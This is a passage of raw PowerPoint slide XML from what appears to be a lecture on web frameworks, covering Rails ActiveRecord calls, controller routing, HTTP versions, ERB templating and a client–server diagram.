        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As a programmer, you don't need to worry about the database or "SQL" language </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rails (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ActiveRecord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>user = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>User.create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(name: "David", occupation: "Code Artist")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>david</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>User.find_by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(name: 'David')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>david.destroy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Article.where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('id &gt; 10').limit(20).order('id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3450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Routing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Define a mapping between URLs and server-side functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also define parameters that get passed to the function from the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rails example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BooksController</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ApplicationController</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>@book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Book.find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>:id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>.update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>book_params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>redirect_to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>@book</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    render "edit"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>end	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>end</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5033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Routing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>BooksController</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ApplicationController</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> index</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>@books</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Book.all</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>end</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13097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Hypertext Transport Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Protocol for how a web client can request a resource from a web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Based on TCP, uses port 80 by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Version 1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Defined in RFC 1945 (May 1996)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Version 1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Defined in RFC 2616 (June 1999)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Version 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Based on SPDY, still under discussion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276131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Templating</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Define the view as a simplified language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input: well-defined variables or dictionaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Output: HTML (or JSON or XML, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ruby on Rails uses ERB:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;h1&gt;Listing Books&lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;% @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>books.each</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> do |book| %&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    &lt;td&gt;&lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>book.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %&gt;&lt;/td&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    &lt;td&gt;&lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>book.content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %&gt;&lt;/td&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    &lt;td&gt;&lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>link_to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "Show", book %&gt;&lt;/td&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    &lt;td&gt;&lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>link_to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "Edit", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edit_book_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(book) %&gt;&lt;/td&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    &lt;td&gt;&lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>link_to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "Remove", book, method: :delete, data: { confirm: "Are you sure?" } %&gt;&lt;/td&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>&lt;% end %&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>…  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>&lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>link_to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> "New book", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>new_book_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> %&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16837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Web Ecosystem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5333571"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372595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8" y="3383737"/>
            <a:ext cx="372595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0501" y="2528279"/>
            <a:ext cx="2204096" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>HTTP Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2360501" y="3490722"/>
            <a:ext cx="2356496" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>HTTP Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5241045" y="4427555"/>
            <a:ext cx="1808720" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Web 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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7809629" y="2945061"/>
            <a:ext cx="564145" cy="821040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7049765" y="3663049"/>
            <a:ext cx="2067743" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Web Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707333" y="3203530"/>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07333" y="3536137"/>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9273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7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1623186" y="2081230"/>
            <a:ext cx="3710385" cy="93391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a:endCxn id="22" idx="1"/>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833704" y="2989136"/>
            <a:ext cx="0" cy="96325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189681" y="2989136"/>
            <a:ext cx="0" cy="96325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96600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7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1623186" y="2081230"/>
            <a:ext cx="3710385" cy="93391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623186" y="3001135"/>
            <a:ext cx="3862785" cy="1657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1623187" y="3383737"/>
            <a:ext cx="3862784" cy="165788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3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63" y="2989944"/>
            <a:ext cx="810980" cy="720420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1623189" y="2130939"/>
            <a:ext cx="3869198" cy="9339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40461" y="2265229"/>
            <a:ext cx="1419684" cy="16871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581338" y="2360902"/>
            <a:ext cx="1377553" cy="1722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96028" y="80150"/>
            <a:ext cx="1817428" cy="1817428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 25"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2572086" y="447496"/>
            <a:ext cx="564145" cy="821040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Arrow Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1469790" y="705965"/>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469790" y="1038572"/>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04610" y="1897579"/>
            <a:ext cx="0" cy="116727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063" y="1884901"/>
            <a:ext cx="0" cy="117995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3" name="Picture 32"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27" y="3064855"/>
            <a:ext cx="810980" cy="720420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
